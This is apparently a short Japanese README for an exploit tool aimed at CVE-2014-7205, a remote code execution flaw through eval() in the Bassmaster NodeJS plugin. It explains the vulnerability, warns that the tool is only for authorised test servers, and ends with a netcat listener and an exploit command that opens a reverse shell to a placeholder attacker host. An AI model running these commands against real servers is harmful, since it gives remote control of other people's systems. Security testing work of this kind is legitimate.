
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: CVE-2014-7205 を悪用する Python スクリプト。 nodeshell.py: NodeJS 用のリバースシェルを生成する Python モジュール。
!!テスト許可のあるサーバに対してのみ使用すること
CVE-2014-7205 は、NodeJS 用 Bassmaster プラグインにおけるリモートコード実行の脆弱性です。 バージョン 1.5.1 以下が影響を受けます。脆弱性は lib/batch.js ファイルの internals.batch 関数に存在し、 eval() の呼び出しでユーザー入力が適切にエスケープされていません(基本的に正規表現がリクエストに悪意のあるコードが含まれているかをチェックしていません)。
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444